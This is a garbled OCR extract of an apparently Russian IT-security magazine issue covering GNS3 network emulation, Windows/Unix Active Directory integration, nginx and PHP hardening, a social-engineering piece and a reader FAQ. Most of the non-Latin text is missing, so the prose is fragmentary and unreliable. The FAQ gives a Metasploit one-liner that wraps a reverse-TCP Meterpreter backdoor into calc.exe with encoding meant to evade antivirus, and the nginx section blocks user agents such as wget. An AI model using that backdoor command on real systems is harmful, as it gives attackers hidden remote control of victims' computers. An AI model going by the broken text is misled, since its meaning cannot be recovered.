clear ip route *
show ip route

Cisco ,
.

122

,
:
=> idlepc save R1 db

idlepc
:
=> idlepc show R1

, .
,
Dynagen
. , gDynagen (gdynagen.sf.net)

Dynamips + Dynagen.
Dynagen confDynagen (code.google.
com/p/confdynagen)
,
Dynagen ,
.

GNS3
: OpenSource
Web: www.gns3.net
: Windows 2k/XP/Vista, *nix, Mac OS X
: GNU GPL
GNS3 (graphical network simulator)
,
X 07 /138/ 10

WARNING

warning

IOS
idlepc.

GNS3

Network Simulator (isi.edu/nsnam/ns) ,


. nam
(network animator).
Xentaur (xgu.ru/hg/xentaur)
, , Xen.
NetSim (mput.de/projects/code/netsim)
, 3D- .
ProfSIMs (networksims.com), RouterSim
(routersim.com), CertExams.com
(routersimulator.certexams.com) ,
Cisco.

. , ,
Cisco (CCNA, CCNP, CCIP, CCIE) Juniper
Networks (JNCIA, JNCIS, JNCIE). ,
Dynamips, Dynagen Qemu.
Wireshark (wireshark.org).
Cisco IOS, GNS3 olive- JunOS (juniper.net/ru/ru/products-services/nos/
junos) ,
Juniper Networks.
Ethernet, ATM Frame Relay (ASA, PIX).
Dynamips,
.

.
GNS3 Linux. Debian/Ubuntu
:
$ sudo apt-get install gns3

, gpl.code.de.
X 07 /138/ 10

GNS3
gpl.code.de/oswiki/
GplcodedeApt. Python : Qt, PyQt .
Setup Wizard,
:
Dynamips . IOS-.
. "Nodes
Types" , ,
. , ,
, , .
, , IDLE
PC, .
( , , ). , ,
, (,
..) Edit Symbol Manager.
Topology Summary
, ( ). , , GNS3 ,
.
IOS-
Dynamips, Edit IOS images and
hypervisors. image-, ,
RAM .
,
. IDLE PC
( ).
Dynagen,
.
, ,
Add a link. .
, Dynagui
(dynagui.sf.net),
.
GNS3, 2007 .



, , Cisco
Systems Juniper Networks
.z

INFO

info

Packet
Tracert


.
Packet Tracert
,

. , ,



.

HTTP://WWW
links

Dynagen dynagen.
org

Dynamips Dynagen
blindhog.net
IOS
Cisco
tools.cisco.com/ITDIT/
CFN/Dispatch
GNS3
gpl.code.de/oswiki/
GplcodedeApt

Wireshark
wireshark.org
IOS
: www.opennet.ru/
docs/RUS/cisco_basic

123

SYN/ACK
grinder grinder@synack.ru, urban.prankster martin@synack.ru


WINDOWS *NIX
- :
Windows- *nix-
, .
, , , .
, Windows *nix- .

,
,
,
,
.
.
,
,
. (single sign-on, SSO),

.


: , - ..
,

(, Active Directory),

.
*nix-, , ,
. Samba
(winbind) Kerberos. AD
,

OpenSource- (, Squid).
Samba-
.
LDAP--

124

. ,

LDAP-
AD.
OpenSource-,

.
*nix-.
][,
, ,
, Windows-.


UNIX
Microsoft
,
. .
( Win2k3R2)

UNIX (Microsoft Server for NIS, AD Identity
Management for Unix), .
Win2k8
. ,
PowerShell:
PS> Import-Module Servermanager
PS> Add-WindowsFeature ADDSIdentity-Mgmt -restart

Windows ,
.

AD
, MS
,
. ,
NIS (Network Information Service)
, AD, , .

Windows *nix. AD *nix' UID GID.

, NIS


(, ).

SCOM 2007
,
Microsoft. System Center ( SCCM 2007
,
][ 08.2009) System Center Operations
Manager 2007 (OpsMgr 2007, microsoft.com/
systemcenter/en/us/operations-manager.
aspx) , ,
.
IT-, .
OpsMgr 2007
MS, 2008 Cross Platform Extensions
(blogs.msdn.com/SCXplat),
X 07 /138/ 10

,
Linux x86/x64 ( RedHat, SUSE), HP-UX,
AIX Solaris SPARC/x86. CPE : Web Services for Management (WS_Management),
OpenPegasus SSH. . , SSH
. OpsMgr, *nix-
.
, TechNet (technet.microsoft.com/
en-us/systemcenter/scx/default.aspx).
*nix-
OpsMgr
(Apache, MySQL, syslog),
: , , CPU. OpsMgr
Computer and Device Management Wizard - Unix/Linux Discovery
Wizard , .
scx-cimd
scx-wsmand,
.

.

, Windows. *nix + , , ( ,
).
AD, ,
. , *nix
UID GID
,
. ,
, .
, .
, -.

LIKEWISE OPEN
: LIKEWISE SOFTWARE
WEB: LIKEWISE.COM, LIKEWISEOPEN.ORG
: LINUX 2.4/2.6 (X86/X64) RPM&DEB BASED, FREEBSD X86, SOLARIS 8+
(X86/X64, SPARC), OS X 10.4+, HP-UX PA-RISC/IA64, AIX


.
: Centrify DirectControl/Centrify DirectManage, Likewise
Enterprise/Likewise Open, Quest Authentication Services ( Vintela
Authentication Services) Quest One Identity Solution. *nix
Active Directory.
, , ,
. ,
- *nix-, . *nix
Windows
, AD.
, ,
X 07 /138/ 10

: (Open)
(Enterprise). ,
, SSO-
Kerberos 5 NTLM. .
LO . .
,
. (,
, OpenSSH Putty). AD
, .
180 .
, Enterprise, -

125

SYN/ACK

Likewise Open

Likewise
Open
*nix- AD,
AD *nix-,

Gnome GConf, SELinux,


AppArmor sudo,
.
AD,
UID-GID (Likewise
Management Console),
. , Enterprise
,

Windows QAS

.
.
LO , , Red Hat
Enterprise Linux/Fedora/CentOS, Ubuntu,
openSUSE. Ubuntu :
$ sudo apt-get install likewise-open
likewise-open-gui


Win2k8R2 *nix
Windows
*nix .
: SMB NFS. Windows,
*nix. FTP, HTTP, SSH
.. . Linux
, SMBFS CIFS, smbclient. Ubuntu
SMBFS, CentOS CIFS.
:
$ smbclient -L winsystem
*nix (Konqueror,
Nautilus) smb://
winsystem/.
, /
etc/fstab:
//winsystem/share /mnt/win cifs user,uid=500,rw,suid,usern
ame=user,password=pass 0 0
, , autofs. /etc/
auto.master :

winsystem -fstype=cifs,rw,noperm,username=user,password
=pass ://winsystem/share
service autofs restart.
*nix SMB Samba (www.samba.org). /etc/
smb.conf, ,

(Nautilus, Konqueror, smb4k, XSMBrowser).
Win2k3R2, Microsoft
Services for Network File System (
Windows Services for Unix). Win2k8
File Server.
NFS- . NFS- :
> Servermanagercmd install FS-NFS-services

NFS Sharing, .
NFS *nix (, . www.openbsd.
ru/docs/steps/nfs.html). /etc/exports
Windows
:
> mount \\192.168.1.12\share Z:

/smbmount /etc/auto.smb
/etc/auto.smb :

126

showmount -e IP_server .
X 07 /138/ 10

WARNING

warning

*nix
AD, *nix
DNS NTP

.

QAS

, RPM DEB. , Ubuntu


:
$ sudo chmod +x ./LikewiseIdentityServiceOpen5.3.0.7766-linux-amd64-deb.sh
$ sudo sh ./LikewiseIdentityServiceOpen5.3.0.7766-linux-amd64-deb.sh

GUI:
$ sudo chmod +x ./LikewiseDomainJoinGui5.3.0.7766-linux-x86_64-deb-installer
$ sudo sh ./LikewiseDomainJoinGui-5.3.0.7766linux-x86_64-deb-installer

.
,
LO- ,
. *nix-
: lsassd (),
netlogond ( ), dcerpcd (RPC), lwiod (
SMB) eventlogd ( ).
OU, : *nix-, ( primary)
.
:
$ /opt/likewise/bin/domainjoin-cli join
synack.ru admin

'--preview' ,
.
;
,
DOMAIN\\username.

QUEST AUTHENTICATION SERVICES


: QUEST SOFTWARE
WEB: QUEST-SOFTWARE.RU
: LINUX X86/X64, SOLARIS X86/X64/SPARC, AIX, HP-UX,
MAC OS X, HP-UX IA64/PA-RISC, IBM AIX X86/X64, SGI IRIX,
TRU64, XENSERVER, VMWARE ESX SERVER

QAS , AD, *nix-


. X 07 /138/ 10

Windows
Linux
, GPO, SSO- -Windows , Kerberos LDAP.
QAS
ARC4 128- , ,
56- DES,
Kerberos.
QAS *nix
/
, -.
AD,
, , , ,
. ,
.
NIS- NIS AD. ISO- (
).
, install.sh
preflight.sh .
QAS
.
*nix .
RPM/DEB client, SDK .

. vasd
,
. vasd vastool.
Windows
,
. ,
Win2k3R2, AD,
Unix- (UID, GID,
, ),
Schema Wizard,
Schema.

, .
: *nix-
OU.

INFO

info
SCCM 2007

, ][ 08.2009.

HTTP://WWW
links

Microsoft System
Center Operations
Manager 2007 :
microsoft.com/
systemcenter/en/us/
operations-manager.
aspx
OpsMgr 2007
Cross Platform
Extensions: blogs.
msdn.com/SCXplat,
technet.microsoft.com/
en-us/systemcenter/
scx/default.aspx
NFS
Linux: linux-nfs.org

127

SYN/ACK

NFS Win2k8R2
CENTRIFY DIRECTCONTROL
: CENTRIFY CORPORATION
WEB: CENTRIFY.COM
: LINUX X86/X64, MAC OS X, SOLARIS/
OPENSOLARIS X86/X64/SPARC, IBM AIX, SGI IRIX,
HP-UX, VMWARE ESX SERVER

Centrify DirectControl *nix ,


. ,

,
AD.
, .

,
225 ; centrify.com/
directcontrol.
Centrify DirectManage
Windows -. ,
Active Directory
Centrify Profile,

128

,
: , , UID,
. DirectControl ,


,

. . ,

.
. (
)
,
.
.
, , ,

.
,
.

.
*nix- , , .
DirectControl
,
GPO. *nix, Windows
, .
( , *nix-, primary-
..) ,
*nix-
AD, .

, Windows *nix
,
, ,
.
,

. z
X 07 /138/ 10

j1m@synack.ru


NGINX WEB-
Web- nginx Web-. :

. , Apache, nginx
Web-, nginx
.
, , , nginx. ,
Web- .

,
, , -
Web-.

nginx
. ,
,
,
Web-, -.


Web-
nginx, src/
http/ngx_http_header_filter_module.c
:
static char ngx_http_server_
string[] = "Server: nginx" CRLF;
static char ngx_http_server_full_
string[] = "Server: " NGINX_VER
CRLF;

- :
static char ngx_http_server_
string[] = "Server: ][ Web Server"
X 07 /138/ 10

CRLF;
static char ngx_http_server_full_
string[] = "Server: ][ Web Server"
CRLF;


nginx-
nginx
Web- ,

. ,
,
.
,
.

:
# ./configure --without-http_
autoindex_module --without-http_
ssi_module
# make
# make install

nginx ( ) SSI (Server Side Includes)


Autoindex. ,
Web-,
configure '--help'.

NGINX.CONF
nginx .
, , -



nginx.conf "server_tokens
off". nginx
Web- , .


server :
# vi /etc/nginx/nginx.conf
#

client_body_buffer_size 1K;
#

client_header_buffer_size 1k;
#
, ContentLength .
,

client_max_body_size 1k;
#

large_client_header_buffers 2 1k;

large_client_
header_buffers. ,
URI nginx ,

129

SYN/ACK

( x86 4 ).
, keep-alive. 1 URI
2 , DoS-.
:
# vi /etc/nginx/nginx.conf
#
client_body_timeout 10;
#
client_header_timeout 10;
# , keep-alive

keepalive_timeout
5 5;
#
send_timeout
10;



Web- DoS :
# vi /etc/nginx/nginx.conf
# (slimits),
. 1
32000 , 5
limit_zone slimits $binary_remote_addr 5m;
# . , IP
limit_conn slimits 5;

HTTP, location. ,
Service unavailable 503.

130



Web-.
IP- 80
HEAD - ( ). ,
IP- ( location):
# vi /etc/nginx/nginx.conf
if ($host !~ ^(host.com|www.host.com)$ ) {
return 444;
}


Web-

/ ,
RFC 2616 , Web- , . GET (
), HEAD ( ) POST (
),
server
:
# vi /etc/nginx/nginx.conf
if ($request_method !~ ^(GET|HEAD|POST)$ ) {
return 444;
}


,
(user-agent). ,
, :
X 07 /138/ 10

nginx
FreeBSD ,
return 403;
}
}

nginx
# vi /etc/nginx/nginx.conf
#
if ($http_user_agent ~*
LWP::Simple|BBBike|wget) {
return 403;
}
#
if ($http_user_agent ~*
msnbot|scrapbot) {
return 403;
}

Referrer-
Web- ,
Referrer- ( -
, referrer
).
SEO-
-,
.

, , .
# vi /etc/nginx/nginx.conf
# server
if ( $http_referer ~* (babes|forsale

|girl|jewelry|love|nudit|organic|p
oker|porn|sex|teen) )
{
return 403;
}


( ) .
, , ,
,
,
Web-, .
,
,
, ( ,
referrer-
). server nginx.conf
(host.com ):
# vi /etc/nginx/nginx.conf
location /images/ {
valid_referers none blocked www.
host.com host.com;
if ($invalid_referer) {

Nginx Web- .
Netcraft, 12
Web- , Rambler, Yandex,
Begun, Wordpress.com, Wrike, SourceForge.net, vkontakte.ru, megashara.com, Taba.ru. ,
select, epoll (Linux), kqueue (FreeBSD)
( 1
16 ), nginx , 10000 (
C10K). Rambler
2004 BSD- .
X 07 /138/ 10




.
return 403 :
rewrite ^/images/uploads.*\.
(gif|jpg|jpeg|png)$ http://www.
host.com/banned.jpg last

Web-, nginx
IP- .

. ,
URI :
# vi /etc/nginx/nginx.conf
location /uploads/ {
#

allow 192.168.1.0/24;
#
deny all;
}

uploads

.
.
nginx-
(
admin):
# mkdir /etc/nginx/.htpasswd
# htpasswd -c /etc/nginx/.htpasswd/
passwd admin

nginx.conf
:
# vi /etc/nginx/nginx.conf
location /admin/ {
auth_basic "Restricted";

131

SYN/ACK

nginx Ubuntu
auth_basic_user_file /etc/nginx/.htpasswd/passwd;

PHP

:
# htpasswd -s /etc/nginx/.htpasswd/passwd

SSL
,
, , ,
, . Nginx
SSL, .
SSL- nginx
. :
#
#
#
#
#
#

cd /etc/nginx
openssl genrsa -des3 -out server.key 1024
openssl req -new -key server.key -out server.csr
cp server.key server.key.org
openssl rsa -in server.key.org -out server.key
openssl x509 -req -days 365 -in server.csr \
-signkey server.key -out server.crt

nginx:
# vi /etc/nginx/nginx.conf
server {
server_name host.com;
listen 443;
ssl on;
ssl_certificate /etc/nginx/server.crt;
ssl_certificate_key /etc/nginx/server.key;
access_log /etc/nginx/logs/ssl.access.log;
error_log /etc/nginx/logs/ssl.error.log;
}

Web-:
# /etc/init.d/nginx reload

, Web-
. :
. /etc/sysctl.conf
:
# vi /etc/sysctl.conf
# smurf-

132

net.ipv4.icmp_echo_ignore_broadcasts = 1
# ICMP-
net.ipv4.icmp_ignore_bogus_error_responses = 1
# SYN-
net.ipv4.tcp_syncookies = 1
#
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0
#
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
#
net.ipv4.ip_forward = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.send_redirects = 0
# ExecShield
kernel.exec-shield = 1
kernel.randomize_va_space = 1
#
net.ipv4.ip_local_port_range = 2000 65000
# TCP-
net.ipv4.tcp_rmem = 4096 87380 8388608
net.ipv4.tcp_wmem = 4096 87380 8388608
net.core.rmem_max = 8388608
net.core.wmem_max = 8388608
net.core.netdev_max_backlog = 5000
net.ipv4.tcp_window_scaling = 1


Web-
Web-
, ,
Web-. /etc/
fstab :
/dev/sda5 /nginx ext4 defaults,nosuid,noexec,nodev 1 2

nginx chroot/jail-
*nix-
. Linux KVM, Xen, OpenVZ VServer, FreeBSD Jail, Solaris
Zones. ,
nginx chroot,
, .
X 07 /138/ 10

# vi /etc/pf.conf
webserver_ip="1.1.1.1"
table <abuse> persist
block in quick from <abuse>
pass in on $ext_if proto tcp to $webserver_ip \
port www flags S/SA keep state \
(max-src-conn 100, max-src-conn-rate 15/60, \
overload <abusive_ips> flush)


(15 ) 100.

PHP
nginx PHP, .
/etc/php/php.ini
:


SELinux nginx

,
SELinux AppArmor. , Web-.
nginx,
SELinuxNginx (http://sf.net/projects/selinuxnginx/) SELinux, .
#
#
#
#

tar -zxvf se-ngix_1_0_10.tar.gz


cd se-ngix_1_0_10/nginx
make
/usr/sbin/semodule -i nginx.pp


nginx ,
,
, .
, ,
80, 110 143- (, , nginx
IMAP/POP3-).



Web- IP- .
DoS- . Linux
iptables/netfilter- state:
# iptables -A INPUT -p tcp --dport 80 -i eth0 \
-m state --state NEW -m recent --set
# iptables -A INPUT -p tcp --dport 80 -i eth0 \
-m state --state NEW -m recent --update \
--seconds 60 --hitcount 15 -j DROP

IP 15. pf:
X 07 /138/ 10

# vi /etc/php/php.ini
#
disable_functions = phpinfo, system, mail, exec
#
max_execution_time = 30
# ,

max_input_time = 60
# ,

memory_limit = 8M
# , POST
post_max_size = 8M
#
upload_max_filesize = 2M
# PHP-
display_errors = Off
# Safe Mode
safe_mode = On
# SQL Safe Mode
sql.safe_mode = On
#
safe_mode_exec_dir = ////
# PHP
expose_php = Off
#
log_errors = On
#
allow_url_fopen = Off

, Web-. ,
. ,
, , nginx ,
,
.
Web-, ,
. ,
Web-. z

133

UNITS

Oriyana oriyana@xpsycho.ru

PSYCHO:

-, ,
, ,
,
e-mail, ICQ

,
, ,
.
.

: , ,
.
,
, .
.
: GoodGod

socialware.ru;
Ayumi (spylabs.org);
,
.
!

ICQ
( primary e-mail)

ICQ :

e-mail (
][ 2009 , GoodGod);
ICQ, ;
ICQ, SEO
(
).
, , . -

134

: ,
, - .

, .
, () .
,
( , ,
). -
, ,
, :
,
200 .
,
. , ,
;
.
, ,
, , .
, - (
, ). ,
? ? , ... , . ,
.
ICQ Search, ,
(200
1400
).
,

.
,
. ,
: , , whois ,
( )
E-mail ICQ.
,
e-mail,
,
. ,
e-mail, UIN !
e-mail, ,
,
.


, ,
:
;
;
;
;
( ; ;
; ).
, , ,
.
,
,
.
X 07 /138/ 10

.
ICQ . -,
( )

.
,
, ,
.
?

,
. . :
, ,

. .
, ,
,
.
,
;
, ,
, .
, .
, .

, , , ,
.
,
,
.

,
,
, ,
.
X 07 /138/ 10



. ,
, , ( ,
),
,
( ).
. ,
.

,
. ,

. ,
( ) .
,
.
:
(: )
. : , (
)!
,

. , . , ( ).
5 ,
. ,
( ).
.
,
. ,
, , .
,

.

: 15-17 2010 ( )
100% ! ,
(). .
, . .
(). , 10
. ().

.
.

, (
), .
// HOSTS, DNS
DHCP- . , , e-mail,

, . ,


,
. ,
.

-,

.
, .
.

. .

135

UNITS

,



. ,
.
, ,

.
, (
:)).
+ .
3. .
-
, ,
,
.
, ,
.

.
-,
. ,
.
, ,
,
-
, .
,
:).
.
4. .
(-, )
,
. ,


, , ,
, .exe
3D.
1. .

, ,
, ,
( , !),
- SMS.
,
(
). ,

. + .

136

2. .
,

. , , ( , ).

, , ,
,
.exe
3D.
,
,
. : ,
, -
,


: ( ),
-. ,
/ (
), , ,
. !
.
5. -
.
- : ( ).
().
(12 ) .
e-mail:
X 07 /138/ 10

( ), e-mail,
, .
, , .

.

SHKOLNIK.RU
whois- e-mail,
. e-mail yandex.
ru, .

.

.
, .

HACKERSOFT.RU
, .
. ,
-. whois,
(mchost.ru) e-mail,
.
e-mail, : hackersoft.
ru@mail.ru,

, , , e-mail
. , , .
!
: ,

. , -
, , . , e-mail -

beta-testing@***.com. ,

.
.


. .
.

,
socialware.ru.

X 07 /138/ 10

137

UNITS

.
, e-mail
gmail.com.
-
hackersoft.ru@gmail.com. ,
.
.
, .
.

http://socialware.ru.

.

.

138

,
,
,
.
,
,
,
,
. :
, , .
( ) ,
: ,
,
WebMoney;
. ,

:
( ), ,
.

.
?
, , (
), , .

, ,
,
(
), ,
, , .


.
:
,
IT, ( Free Pascal
IDE); -108 (
);
, , :
(QIP,
VTalking), ICE Book Reader;
,
, :
Windows ( 2010 ),
;

(Alcohol, DVD Decrypter, Clone DVD, Nero)
+ Media Coder ;

(: .doc, .doc, );
WebStream,
.
WebStream 11 ,
;
: Opera, IE, FF; COMODO Internet
Security; Nokia.


()

,
, ,

.
, .
, ,
,
.
. , -
X 07 /138/ 10


(phishing, . fishing , ) -, ,
. , .
(farming . .
,
) DNS- HOSTS
.
( ,
,
):
1. ;
2. ;
3. .
- ().
,
. ,

().

, .

/, :).
. ,

: ,
-
..
.

: ,

, ,
,
.
,

,
. .
, (
),
: ,
, batch/VBScript/JScript-
. ,

,
.
,
ICQ,
, ,
.
-
,

. ,
- . ,
-IT.

,
.
( , ). ,
,
X 07 /138/ 10

(. ),
, ..
,
, ,
,
.
.
: , (
,
, ). , ,
,
( ).
, , .

,
. : 10-15 ?
.
, ,
,
. , ,
, -


.
, -
,
. ,
, ,
.
,
.
, , ,
,
.
,
. .
:
,
, .
,
.

,
, , .
, .
, , ,
.
, . , ,
,
,

.
,

:
1. .

,

.
2. ,
.
.
3. .
,
, .
(
).
4. .
.
.
,
.
.z

139

UNITS
ant

faq
united
@real.xakep.ru

Q: , ,

API-. MSDN,
. - IDA,
API-?

: , ,
API , ,
. ,
zynamics.com ida-msdn-
( : github.com/zynamics/msdnplugin-ida),
MSDN API , . ,
MSDN XML-.
msdncrawler (github.com/zynamics/msdn-crawler),
MSDN
XML- , API Windows (,
, ).
msdn-crawler
33984 (!) . msdn.xml,

IDB-, IDA.
IDAPython
ida_importer.py.
Q: Tor
. , , sslstrip, ,
.
- ?

140

A: 100% , -
. TorTunnel (www.
thoughtcrime.org/software/tortunnel)
TorScanner.

, ,
,
HTTPS HTTP:
torscanner host port / > dump.txt. ,

ExcludeNodes, Tor
.
, : , .
100% .
Q: SWF-
. ,
Flash.

A:
Flash-,
Flare OWASP's SWFIntruder.
,
,
, 9 10 Flashe,
ActionScript 3 Adobe Flex.
HP SWFScan (www.hp.com/go/swfscan).

, ActionScript 2.0
ActionScript 3.0.

Flash-. 60 ,
, XSS, (cross-domain privilege escalation)
. HP SWFScan ,
,
,

.
Q: -
Firefox Opera Chrome?

A:
Transmute (www.gettransmute.com),
-
. ,
(Firefox, Google Chrome, Opera, Internet Explorer
), -
. , Google Bookmarks, Delicious

.
Q: - JavaScript .
. ,
. ?

A: code.
replace(/\/\*.+?\*\/|\/\/.*(?=[\n\r])/g, '').
, ,
:
X 07 /138/ 10

Q:
?

A: ! ,
Gmail, ,
, Undo,
. ,
,
5 20 .
Outlook,
Exchange-
,
.
Q: RFID. ,

,
- . , RFID-
,
check-in -. ,
, RFID--

Python Visual Studio


1. var str = " /* not a real comment */ ";
2. var regex = /\/*.*/;
,
.
Q: Backtrack

. ?

A: Asus
/etc/X11/xinit/xinitrc:
xrandr output HDMI-2 offxrandr
output VGA off
xrandr output HDMI-2 off
xrandr output VGA off


(Firefox/Chrome);
LSP (Layered Service Provider),

DLL-
Winsock API.
:
(, Super Bank)
,
,

.

. ,
?

A: ,
!
.
RFID- . , ,
, .
-
. ,
www.dealextreme.com,
,
NoName RFID $40.
, -
. ,
-
. -


.
Q: ,
(
, ,
-)?

A: ,
, - .
:
API- ( ,
WinInet API);
BHO (Browser Helper Object)
DLL-,
Internet Explorer ;
(
API- FindWindow);
COM (Component Object Model) / OLE
(Object Linking and Embedding) ;
X 07 /138/ 10

141

UNITS

Q: ,
Excel-
(*.XLS).
, Python. ?

A: .
, , Pyxlreader (pyxlreader.
sourceforge.net),
COM,
Excel (
).

Excel.
Q: , iPhone?

RFID- $52
, RFID-
Paralax (www.parallax.
com),
/USB .
(
RFID Card Reader) $39,99
. :
RFID- $0,99.

Wi-Fi (
).
,
(
).
Q: Visual Studio
Python?

Q: . MAC-,
, ,
.
,
(, IP-).
.
?

A: , ,
, ,
IP-, .
! GPS ,
.
,
Wi-Fi (MAC ESSID)
(
, Google. ).
,

, .


.
,

Prey (preyproject.com).
: Windows, Mac
Linux,
Android. Prey
URL, ,
.
,

142

A: .
IronPython (
Python .Net)

Python- Visual Studio 2010.
,
IDE Microsoft,
Python,
( C#)
IntelliSense
.
Q:
Windows-
.

A: , exe .
, , , ,
Metaspoit'.
msfencode,
Metasploit,
backconnect:
./msfpayload windows/meterpreter/
reverse_tcp LHOST=< ip> R | ./
msfencode -t exe -x calc.exe -k -o
calc_backdoor.exe -e x86/shikata_
ga_nai -c 5

exe-
,
.

A: iPhone
Mach-O.

IPA- zip-, , -.
,
, ,
JailBrake (
).
gdb/
iphonedbg. AppStore : Mach-O. ,
,
Objective-C.
Apple
Smalltalk. ,
.
(>80%)
objc_msgSend().
,

zynamics Objective-C
helper (github.com/zynamics/objc-helperplugin-ida), IDA Pro
.
Q:
A-GPS (Assisted GPS).
,
. ,
GPS ?

A: , Assisted GPS
,
GPS, . ,
,

.
, GPS- : A-GPS
. , A-GPS
, ,
.z
X 07 /138/ 10

>Multimedia
VideoInspector 2.2.4.123

>Misc
Prey 0.3.7
win7stack 0.80
GiMeSpace Free Edition 1.0.4.6
GetFoldersize 2.2.10
AllDup 3.0.2
RBTray 4.1
FLV Extract 1.6.0
Writespace 1.4
OnTopReplica 2.9.3
Ditto-cp 3.16.8
TeraCopy 2.12
Grow 2.0.3
PrintConductor 1.5
ViGlance OneStep V1
UltraSearch 1.3
1Password for Windows 1.0 beta
Clavier+ 10.6.1
PREDATOR 2.2.0
TouchFreeze 1.0.2

>System
Guru3D - Driver Sweeper
Explorer++ 1.1
Splunk 4.1.2
CrystalDiskMark 3.0.0d
LogLady 1.1
Sikuli IDE 0.10.1
RegFromApp 1.21
DOSBox 0.74
Soluto 1.0.721.0
VirtualBox 3.2 beta1
PC-Wizard 2010.1.94
Kiwi 1.4.2
FreeFileSync 3.7
HFSExplorer 0.21

>Net
FriendSea Presenter 1.2.0.6
NetSetMan 3.0.3
HomePipe
NetBalancer 1.0
TweetMyPC 3
Firewall Builder 4.0
inSSIDer
RFIDIOt 1.0a
Odysseus 2.0.0.84
Tinc 1.0.13
KpyM TelnetSSH Server 1.18b
USB to Ethernet 3.0.6

>Security
Webreak beta 0.1.1
MetaGooFil 1.4b
theHarvester 1.6
WebSlayer Beta
ProxyStrike 2.2
Sqlninja 0.2.5
Lansweeper 4.0
FUU 0.1beta
Malware Check Tool 1.0
Aircrack-ng 1.1
SIP Inspector 1.10
Blazentoo 0.1b
ThreatFactor NSIA
WhatWeb 0.4.3
Safe3 SQL Injector 6.2
ExploitMyUnion 2.1
iScanner 0.6
Yara 1.4
Harden SSLTLS beta
WebCruiser 2.3.2
FoxAnalysis 1.4.2
ChromeAnalysis 1.0.1
Watcher 1.4.0
Vera 0.1

Visual Studio
VisualSVN Server 2.1.2
VisualSVN 2.0.1
Visual Assist X 2010
TestDriven.NET 3.0 Personal
StyleCop 4.3.3.0
ReSharper 5.0
NUnit 2.5
GhostDoc 2.5
DPack 3.0.3 for Visual Studio 2010
CruiseControl.NET 1.5
CodeRush 2010.1.4

Visual Studio
Go To Definition 2.1
Triple Click 2.0
Hide Main Menu
ItalicCommentsFree 2.0
MoveToRegionVSX
Word Wrap with Auto-Indent 1.0
Regex Editor 1.5
GradientSelection 2.0
Selection Foreground 0.1
StructureAdornmentFree 1.9
Highlight all occurrences of selected
word 1.31
Find Results Highlighter 1.0
Visual Studio Background
Customizer 1.0
Visual Studio Color Theme Editor 1.0
IntelliSense Presenter 1.5

REAPER 3.52
mflow
RasterVect Free Edition 16.0
tinti 2.2.2
Taffy 0.5.0beta
VidCoder 0.41
Inkscape 0.47
Similarity 1.3
Free Audio Editor 2010

>>WINDOWS
>Development
Visual Studio 2010 Express
The Regex Coach 0.9.2
OllyDbg 2.0
Regulator 2.0
Regulazy 1.03
{smartassembly} 4.2
RJ TextEd 6.40

>System
ATI Catalyst 10.5
VMWare Workstation 7.1
XNeur+gXNeur 0.9.9
SystemRescueCd 1.5.4
Open vSwitch 1.0.0
VirtualBox 3.2.2
ZFS-Fuse 0.6.0
Linux Kernel 2.6.34
DOSBox 0.74
Ganeti 2.1.2
Memtest86+ 4.10
nVidia 195.36.24
YASMon 0.0.5
OpenAFS 1.4.12.1
ROXTerm 1.18.3
Wine 1.0.1
Wmc2d 2.03

>Games
The Battle for Wesnoth 1.8.2

>Net
Google Chrome 5.0.375.55
KTorrent 4.0
Midori 0.2.6
Pidgin 2.7.1
EiskaltDC++ 2.0.2
RTMPdump 2.2e
Mozilla Firefox 3.6.3
Dropbox 0.6.571
Mozilla Thunderbird 2.0.0.24
NetworkManager 0.8
Pino 0.2.10
Opera 10.10
gPodder 2.6
Konversation 1.2.3
GoldenPod 0.8.3
SIM IM 0.9.4.3
Xchat 2.8.8

>Security
LFT 3.1
Nufw 2.4.2
OpenScap 0.5.11
Suricata 0.9.1
Keychain 2.7.1
Whatweb 0.4.3
Joomla sqli sploiter
Column finder
Darkjumper 5.7
Iptables 1.4.8
Clamav 0.96.1
Metasploit Framework 3.4.0
Hashkill 0.2.0
Ctunnel 0.3
Graudit 1.6
Xplico 0.5.7
Sqlninja 0.2.5
iScanner 0.5
Complemento 0.7.6
Samhain 2.7.0
Authfail 1.1.7

Lightspark 0.4.0

>Server
Sipwitch 0.8.3
Cherokee Webserver 1.0.1
Adchpp 2.5
Kamailio 3.0.2
Radmind 1.13.0
Fapws3 0.5
Socks Server5 3.8.2
LFTP 4.0.8
RabbIT 4.6
Ziproxy 3.0.1
MySQL 5.1.47
Apache 2.2.15
BIND 9.7.0
CUPS 1.4.3
DHCP 4.1.1
OpenLDAP 2.4.22
OpenSSH 5.5
OpenVPN 2.1.1
Sendmail 8.14.4
Asterisk 1.6.2

>Devel
Akshell 0.2
Android NDK R4
Android SDK R6
Apache Rivet 2.0
Arcadia 0.8.1
Automake 1.11.1
Bviplus 0.9.4
db4o 8
Django 1.2
Execute Query 3.2.1
jMonkeyEngine3 SDK alpha
JRuby 1.5.0
Native Client SDK
Qt 4.6.2
Rubinius 1.0
Smalltalk 3.2
Spket IDE 1.6.18
xmlsec1 1.2.16
ADT 0.9.7

>>UNIX
>Desktop
Banshee 1.7.1
Cdrtools 3.0.0
DirSync Pro 1.3
DockBarX 0.39
Dynamic Window Manager 5.8
Emacs 23.2
Evince 2.30.1
FFmpeg 0.5.2
Fotoxx 10.4
F-Spot 0.6.2
KOffice 2.2
MC 4.7.2
MythTV 0.23
Parole 0.2.0.2
PeaZip 3.1
Sweet Home 3D 2.4
Xfce 4.6.2

Kaspersky CRYSTAL 9.0


ESET NOD32 4.2

07(138) 2010

LOTUS DOMINO
SKYPE

07 (138) 2010



: 2
10
.

. 107

. 52

. 26

. 110

AMAZON S3

WEB-

UNITS

HTTP:// WWW2

PASSWORDCARD

www.passwordcard.org PREZI
www.prezi.com
( b15DbaL) .
! , . ,
- ,
. . PasswordCard , -
. ,
.
-, ,
- , ,
.
, , ,
.
PasswordCard.

Microsoft , PowerPoint 2010 , . ,


- Prezi :). :
,

. ,
, , ,
, .
,
, ,
, , ,
:).


Javascript

JSCRAMBLER

RAPID7 ONLINE SCAN www.jscrambler.com


rapid7.com/freescan.jsp

Rapid7, , , Metasploit
. ,
Rapid7 NeXpose. ,
( ), ,
(--). ,
-
. ,
. , :

Reports.

144

Google I/O
: 2004
. , -
( Google).

, -, , , JavaScript, .
, ,
. , - JScrambler.
- , . , ,
.
X 07 /138/ 10